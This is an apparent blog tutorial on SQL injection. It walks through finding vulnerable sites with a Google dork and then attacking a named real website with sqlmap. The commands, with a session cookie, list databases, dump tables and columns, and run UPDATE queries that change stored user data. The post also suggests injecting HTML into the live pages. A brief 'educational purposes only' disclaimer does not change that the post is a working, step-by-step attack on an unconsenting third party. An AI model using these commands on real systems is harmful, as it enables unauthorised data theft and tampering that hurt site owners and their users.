Hacking remote databases using SQL injection
Understanding SQL Injection
SQL injection is a cyber attack technique where malicious SQL queries are inserted into an application’s query string, targeting websites vulnerable to this exploit. This method can be used to gain unauthorized access to a website’s data, deface the site, tamper with existing data, and more. SQL injection attacks pose severe threats to the security of websites, potentially exposing sensitive data and harming stakeholders.
In this blog, we will demonstrate how to identify a website susceptible to SQL injection and exploit this vulnerability using a tool called SQLMap. We’ll start by using Google dorks to locate a vulnerable site. If you’re unfamiliar with Google dorks, please read my previous blog.
Using Google Dorks to Find Vulnerable Sites
A simple Google dork to identify potential SQL injection vulnerabilities is:
inurl:index.php?id=
This query returns numerous search results, many of which might be vulnerable if they do not properly sanitize the query string. As an example, let’s investigate one of the search results.
Quick Check for SQL Injection Vulnerability
From the search results, I found a site, karaoke.co.nz, that is vulnerable to SQL injection. By visiting:
http://karaoke.co.nz/items/index.php?id=37
and appending a single quote at the end of this URL:
http://karaoke.co.nz/items/index.php?id=37'
we can see an error indicating improper sanitization of query strings:
Unable to query local database to select Identifier
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1 select * from Category where Identifier = 37'
This confirms the site’s vulnerability. Below is a partial dump of one of the database tables from this site.
Using SQLMap
To exploit this vulnerability, we’ll use SQLMap. First, download and install Python from here. Then, download and install SQLMap from here.
Once installed, navigate to the SQLMap directory and run the following command to familiarize yourself with SQLMap:
sqlmap.py --help
This command provides a detailed list of options available in SQLMap. Here are some key options:
-u URL, --url=URL
: Target URL (e.g., “http://www.site.com/vuln.php?id=1“)-g GOOGLEDORK
: Process Google dork results as target URLs--data=DATA
: Data string to be sent through POST--cookie=COOKIE
: HTTP Cookie header value--random-agent
: Use randomly selected HTTP User-Agent header value--proxy=PROXY
: Use a proxy to connect to the target URL--tor
: Use Tor anonymity network
Dumping Databases with SQLMap
To dump all the databases of the vulnerable site, use the following command:
python sqlmap.py -u http://www.karaoke.co.nz/items/index.php?id=37 --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbs
This will return the database names, such as claireg_karaoke
and information_schema
.
To get a list of tables and other diagnostic data, use:
python sqlmap.py -u http://www.karaoke.co.nz/items/index.php?id=37 -D claireg_karaoke --tables --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee"
python sqlmap.py -u http://www.karaoke.co.nz/items/index.php?id=37 -D information_schema --tables --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee"
Once we have the table names, we can retrieve the column names:
python sqlmap.py -u http://www.karaoke.co.nz/items/index.php?id=37 -D claireg_karaoke -T <table_name> --columns --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee"
To dump the values of the columns, use:
python sqlmap.py -u http://www.karaoke.co.nz/items/index.php?id=37 -D claireg_karaoke -T <table_name> --columns --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dump
Changing Database Contents with SQLMap
In addition to dumping database contents, SQLMap allows you to modify the data in the database. This can be done using SQL injection to execute arbitrary SQL commands.
To update a specific value in the database, you can use the --sql-query
option. For example, to update a value in a table:
python sqlmap.py -u http://www.karaoke.co.nz/items/index.php?id=37 --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --sql-query="UPDATE <table_name> SET <column_name>='new_value' WHERE <condition>"
For example, if you want to change the username of a user with id=1
in a users
table:
python sqlmap.py -u http://www.karaoke.co.nz/items/index.php?id=37 --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --sql-query="UPDATE users SET username='new_username' WHERE id=1"
Exploiting the Vulnerability Further
Besides dumping and modifying databases, you can also manipulate the query string to change the HTML webpage. Since the website fails to sanitize the query string, you can inject HTML or other content.
Disclaimer
The information provided here is for educational purposes only. Any unethical use of this information is not our responsibility.
Follow us on :-
Facebook:Â https://fb.com/skillcef
Linkedin:Â https://linkedin.com/company/skillcef
Happy hacking!